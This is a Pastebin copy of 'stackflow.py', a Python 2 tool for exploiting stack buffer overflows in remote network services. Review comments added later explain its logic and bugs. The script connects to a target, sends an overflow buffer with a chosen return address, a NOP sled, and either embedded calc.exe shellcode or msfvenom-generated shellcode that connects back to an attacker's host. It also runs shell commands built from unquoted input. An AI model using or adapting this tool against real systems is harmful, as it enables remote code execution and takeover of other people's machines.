stackflow

BIe
Feb 15th, 2014
225
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.85 KB | None | 0 0
  1. #!/usr/bin/python
  2. #
  3. # Stackflow.py - Universal stack-based buffer overflow exploitation tool
  4. # by @d4rkcat github.com/d4rkcat
  5. #
  6. ## This program is free software: you can redistribute it and/or modify
  7. ## it under the terms of the GNU General Public License as published by
  8. ## the Free Software Foundation, either version 3 of the License, or
  9. ## (at your option) any later version.
  10. #
  11. ## This program is distributed in the hope that it will be useful,
  12. ## but WITHOUT ANY WARRANTY; without even the implied warranty of
  13. ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  14. ## GNU General Public License at (http://www.gnu.org/licenses/) for
  15. ## more details.
  16.  
  17. from socket import socket, SOCK_STREAM, AF_INET
  18. from os import system
  19. from argparse import ArgumentParser
  20.  
parser = ArgumentParser(prog='stackflow', usage='./stackflow.py OPTIONS')

# Every command-line option as (short flag, long flag, add_argument keywords).
# Registering them from one table keeps the complete flag set readable in one
# place; the resulting Namespace is identical to registering them one by one.
_OPTIONS = (
    ('-r', '--rhost', {'type': str, 'help': 'rhost'}),
    ('-p', '--rport', {'type': str, 'help': 'rport'}),
    ('-c', '--cmds', {'type': str, 'help': 'commands to send to server before overflow'}),
    ('-v', '--vulncmd', {'type': str, 'help': 'vulnerable command'}),
    ('-o', '--offset', {'type': int, 'help': 'offset to EIP'}),
    ('-a', '--returnadd', {'type': str, 'help': 'return addess'}),
    ('-n', '--nops', {'type': int, 'help': 'number of NOPS \\x90 to prepend'}),
    ('-m', '--payload', {'type': str, 'help': 'MSF payload'}),
    ('-i', '--lhost', {'type': str, 'help': 'lhost'}),
    ('-l', '--lport', {'type': str, 'help': 'lport'}),
    ('-f', '--fuzz', {'type': str, 'help': 'Fuzz command with cyclic pattern'}),
    ('-e', '--cfexport', {'type': str, 'help': 'Export exploit config to file'}),
    ('-g', '--cfimport', {'type': str, 'help': 'Import exploit config from file'}),
    ('-t', '--calc', {'action': 'store_true', 'help': 'Send a calc.exe shellcode'}),
    ('-d', '--display', {'action': 'store_true', 'help': 'Display the exploit buffer'}),
)
for _short, _long, _kwargs in _OPTIONS:
    parser.add_argument(_short, _long, **_kwargs)

# Parsed at import time, so importing this module as a library is not possible.
args = parser.parse_args()
  38.  
  39. def banner():
# Print the ASCII-art logo. The art is one triple-quoted literal, so nothing can
# be annotated inside it; leading whitespace of the art was lost in this paste.
# Called only on the usage-error paths at module level, just before
# parser.print_help(). No parameters, returns None.
  40. print ''' MMMMMMMMMM
  41. MMMMMMMMMMMMMMMM
  42. MMMMMMMMMMMMMMMMMMMM
  43. MMMMMMM MMMMMMMM
  44. MMMMMM MMMMMMM
  45. MMMMM MMMMMM
  46. MMMM MMMMMM
  47. MMMM MMMMMM
  48. MMMMM MMMMMM
  49. MMMM MMMMMMM
  50. MMMM MMMMMMM
  51. MMMM MMMMMMMM
  52. MMMM MMMMMMMMMM
  53. MMMM MMMMMMMMMMMMMM
  54. MMMM MMMMMMMMMMMMMMMM
  55. .MMM MMMMMMMMMMMMMMMMMMM.
  56. MMM MMMMMMMMMMMMMMMMMMMMM
  57. M MMMMMMMMMMMMMMMMMMMMMMM
  58. MMMMMMMMMMMMMMMMMMMMMMMM
  59. MMMMMMMMMMMMMMMMMMMMMMMMMM
  60. MMMMMMMMMMMMMMMMMMMMMMMMMM
  61. MMMMMMMMMMMMMMMMMMMMMMMMMMM
  62. MMMMMMMMMMMMMMMMMMMMMMMMMMMM
  63. M MMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  64. MM MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  65. MMM M MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  66. MMMMM MMMMMM MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  67. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  68. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  69. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  70. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  71. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  72. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  73. O.MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMM
  74. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMM
  75. . MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMM
  76. . :MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMM
  77. M MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMM
  78. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM7 MMMMM
  79. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMM
  80. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMM
  81. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMM MMMMMMM
  82. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMM MMMMMMM
  83. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMM
  84. .MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  85. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  86. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  87. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  88. MMMMMMMM MMMMMMMMMMMMMMMMMMMMM
  89. .MMM MMMMMMMMMMMMMMM
  90. MMMMMMMMMMM
  91. MMMMMMM stackflow.py
  92. by d4rkcat
  93.  
  94. '''
  95.  
  96. def pwn(rhost,rport,payload,buflen,lhost,lport):
# Open one TCP connection to rhost:rport, optionally send the '&'-separated
# pre-commands from args.cmds, assemble the buffer and send it once.
#
# Parameters: rhost, rport (strings; rport is int()-converted for connect),
# payload (msfvenom payload name, used only when calc is false), buflen (int,
# length of the filler before the return address), lhost, lport (strings used
# only in the msfvenom command line and the final status message).
# Also reads module globals that are NOT parameters: args, vulncmd, fuzz,
# returnadd, nops, calc, display -- so this only works after the module-level
# argument handling has run.
# Returns None; calls exit() if the connection fails.
# NOTE(review): leading indentation was lost in this paste, so the nesting
# described below is inferred from statement order, not from visible columns.
  97. es = socket(AF_INET, SOCK_STREAM)
  98. print ' [>] Attempting to connect to ' + rhost + ' on port ' + rport + '..'
# Bare except: every failure here, including a non-numeric rport (ValueError
# from int()) and KeyboardInterrupt, is reported as "could not connect".
  99. try:
  100. es.connect((rhost, int(rport)))
# Reads the service banner with no socket timeout set yet; a silent service
# blocks here indefinitely (a timeout is only applied at the very end).
  101. print ' [<] ' + es.recv(2048)
  102. print " [^] Connection established.\n"
  103. except:
  104. print "\n [X] Could not connect to " + rhost + " on port " + rport
  105. exit()
  106.  
# Pre-commands: args.cmds is split on '&' and each piece is sent with CRLF;
# one reply is then read per command, with any recv() error silently ignored.
  107. if args.cmds:
  108. cmds = args.cmds.strip('\n').split('&')
  109. for cmd in cmds:
  110. es.send(cmd + '\r\n')
  111. print ' [>] ' + cmd
  112. try:
  113. print ' [<] ' + es.recv(2048)
  114. except:
  115. pass
  116.  
# Buffer assembly order, from the statements below:
#   [vulncmd + ' '] + filler + returnadd + "\x90" * nops + shellcode + "\r\n"
  117. if vulncmd:
  118. buf = vulncmd + ' '
  119. else:
  120. buf = ''
  121.  
# Fuzz mode replaces the filler with a cyclic pattern produced by an external
# pattern_create tool located via `locate`. The shell command is built by string
# concatenation with `fuzz` inserted unquoted, and the result goes through the
# fixed, predictable path /tmp/fuzz in a shared directory.
  122. if fuzz:
  123. print "\n [*] Generating Pattern.\n"
  124. system('$(locate pattern_create | grep work/tools | head -n 1) ' + fuzz + ' > /tmp/fuzz')
  125. p = open('/tmp/fuzz', 'r')
  126. buf += p.read()
  127. p.close()
# Normal mode: repeat the fixed marker 'PwN3d!' to exactly buflen bytes.
  128. else:
  129. a, b = divmod(buflen, len('PwN3d!'))
  130. buf += 'PwN3d!' * a + 'PwN3d!'[:b]
# NOTE(review): whether the next two lines belong to the else branch or follow
# the whole if/else cannot be told from this paste; if they are at the outer
# level, fuzz mode without -a raises TypeError here (returnadd is None).
  131. buf += returnadd
  132. buf += "\x90" * nops
  133.  
# Detection note: the constant 'PwN3d!' filler, the run of 0x90 bytes and this
# unchanging embedded shellcode are stable on the wire and straightforward to
# match with a network or host signature.
  134. if calc:
  135. print " [*] Using calc.exe shellcode."
  136. buf += ("\xbf\xc2\x51\xc1\x05\xda\xd4\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x33\x83\xea\xfc\x31\x7a\x0e\x03\xb8\x5f\x23\xf0\xc0\x88\x2a\xfb"
  137. "\x38\x49\x4d\x75\xdd\x78\x5f\xe1\x96\x29\x6f\x61\xfa\xc1\x04\x27\xee\x52\x68\xe0\x01\xd2\xc7\xd6\x2c\xe3\xe9\xd6\xe2\x27\x6b"
  138. "\xab\xf8\x7b\x4b\x92\x33\x8e\x8a\xd3\x29\x61\xde\x8c\x26\xd0\xcf\xb9\x7a\xe9\xee\x6d\xf1\x51\x89\x08\xc5\x26\x23\x12\x15\x96"
  139. "\x38\x5c\x8d\x9c\x67\x7d\xac\x71\x74\x41\xe7\xfe\x4f\x31\xf6\xd6\x81\xba\xc9\x16\x4d\x85\xe6\x9a\x8f\xc1\xc0\x44\xfa\x39\x33"
  140. "\xf8\xfd\xf9\x4e\x26\x8b\x1f\xe8\xad\x2b\xc4\x09\x61\xad\x8f\x05\xce\xb9\xc8\x09\xd1\x6e\x63\x35\x5a\x91\xa4\xbc\x18\xb6\x60"
  141. "\xe5\xfb\xd7\x31\x43\xad\xe8\x22\x2b\x12\x4d\x28\xd9\x47\xf7\x73\xb7\x96\x75\x0e\xfe\x99\x85\x11\x50\xf2\xb4\x9a\x3f\x85\x48"
  142. "\x49\x04\x79\x03\xd0\x2c\x12\xca\x80\x6d\x7f\xed\x7e\xb1\x86\x6e\x8b\x49\x7d\x6e\xfe\x4c\x39\x28\x12\x3c\x52\xdd\x14\x93\x53"
  143. "\xf4\x76\x72\xc0\x94\x56\x11\x60\x3e\xa7")
# Otherwise msfvenom is run through the shell with payload, lhost and lport
# concatenated in unquoted; its output is read back from the fixed path
# /tmp/shlcde and unescaped with the Python 2-only 'string_escape' codec.
# A failed or missing msfvenom leaves an empty or stale file, which is then
# appended without any check.
  144. else:
  145. print " [*] Generating " + payload + " shellcode.\n"
  146. cmd = str('$(which msfvenom) -p ' + payload + ''' -e x86/shikata_ga_nai -i 2 -b \\x00\\xff\\x0a\\x0d\\xf1\\x20\\x40 -f py LHOST=''' + lhost + ' LPORT=' + lport + ''' | tail -n +2 | cut -c 8- | tr -d '\n' | tr -d '"' > /tmp/shlcde''')
  147. system(cmd)
  148. p = open('/tmp/shlcde', 'r')
  149. buf += str(p.read().decode('string_escape'))
  150. p.close()
  151.  
  152. buf += "\r\n"
  153.  
  154. if display:
  155. print '\n [*] Exploit Buffer: ' + str(buf)
# send() may transmit only part of buf and still return normally; the except
# below fires only on an actual socket error, and it swallows every exception.
  156. try:
  157. es.send(buf)
  158. if not fuzz:
  159. print '\n [$] Buffer sent, evil shellcode should be running.. ;)'
  160. if calc:
  161. print '\n [$] Calc.exe should be running, enjoy your calculations..\n'
  162. else:
  163. print '\n [$] Payload ' + payload + ' should be connecting back to ' + lhost + ' on port ' + lport + '\n'
  164. else:
  165. print ' [Z] Cyclic pattern fuzzing buffer of ' + fuzz + ' length sent.'
  166. except:
  167. print "\n [X] Exploit Failed! :("
  168.  
# Drain at most one reply with a 0.5 s timeout (timeouts ignored), then close.
  169. es.settimeout(0.5)
  170. try:
  171. es.recv(2048)
  172. except:
  173. pass
  174. es.close()
  175.  
  176. if args.cfimport:
# Module-level driver: optional config import, unpacking of the flags into
# globals, usage validation, return-address byte reordering, then either a
# config export or the single call to pwn().
# NOTE(review): indentation was lost in this paste; nesting is inferred from
# statement order.
  177. if args.cfimport.endswith('.py'):
  178. args.cfimport = args.cfimport[:-3]
  179. cf = args.cfimport
  180. try:
  181. print ' [*] Loading ' + cf + '.py config file\n'
# The "config file" is imported as a Python module and therefore executes as
# code; the argparse Namespace is replaced by the module object. Any exception
# raised while importing it (not only a missing file) is reported as "not found".
  182. args = __import__(cf)
  183. args.cfexport = None
  184. except:
  185. print ' [*] Config file ' + cf + '.py not found!\n'
  186. exit()
  187.  
# Unpack the options into module globals; pwn() reads several of these
# (vulncmd, fuzz, calc, display, returnadd, nops) directly rather than as
# parameters, so they must exist before pwn() is called.
  188. lhost = args.lhost
  189. lport = args.lport
  190. rhost = args.rhost
  191. rport = args.rport
  192. payload = args.payload
  193. buflen = args.offset
  194. fuzz = args.fuzz
  195. calc = args.calc
  196. display = args.display
  197. vulncmd = args.vulncmd
  198. returnadd = args.returnadd
  199.  
# Default sled length when -n is absent; an explicit -n 0 also falls back to 16.
  200. if args.nops:
  201. nops = args.nops
  202. else:
  203. nops = 16
  204.  
# Usage check for the shellcode modes. `not buflen` is tested twice (the second
# is redundant), and an explicit offset of 0 is rejected as "missing".
  205. if not fuzz and not calc:
  206. if not buflen or not lhost or not lport or not payload or not returnadd or not buflen:
  207. print ' [*] You must specify the local host, local port, payload, return address and EIP offset!\n'
  208. banner()
  209. parser.print_help()
  210. exit()
  211.  
  212. if not rhost or not rport:
  213. print ' [*] You must specify the remote host and remote port!\n'
  214. banner()
  215. parser.print_help()
  216. exit()
  217.  
# Return address: the first eight characters are taken as four hex byte pairs,
# reordered to little-endian, and turned into raw bytes with the Python 2-only
# 'string_escape' codec. Any characters beyond the eighth are dropped, and a
# '0x' prefix would be treated as part of the hex digits.
  218. if returnadd:
  219. returnadd = '\\x' + returnadd[6:8] + '\\x' + returnadd[4:6] + '\\x' + returnadd[2:4] + '\\x' + returnadd[0:2]
  220. returnadd = returnadd.decode('string_escape')
  221.  
# Export: parses repr(args), i.e. "Namespace(a=1, b=2)", by stripping the
# parentheses and splitting on ','. A value containing a comma breaks this.
# The startswith('cf') filter is applied before strip(), so every entry after
# the first still carries the leading space from ', ' and is never filtered;
# argparse lists the attributes in sorted order, so the cf* entries are not
# first and end up in the exported file anyway. The file is written as
# 'name=value' lines, i.e. as Python source that -g later imports and runs.
  222. if args.cfexport:
  223. conf = str(args).replace('Namespace', '').strip('(').strip(')').split(',')
  224. cf = open(args.cfexport + '.py', 'w')
  225. for var in conf:
  226. if not var.startswith('cf'):
  227. cf.write(var.strip() + '\n')
  228. cf.close()
  229. print ' [*] Exploit config exported to ' + args.cfexport + '.py\n'
  230. else:
  231. pwn(rhost,rport,payload,buflen,lhost,lport)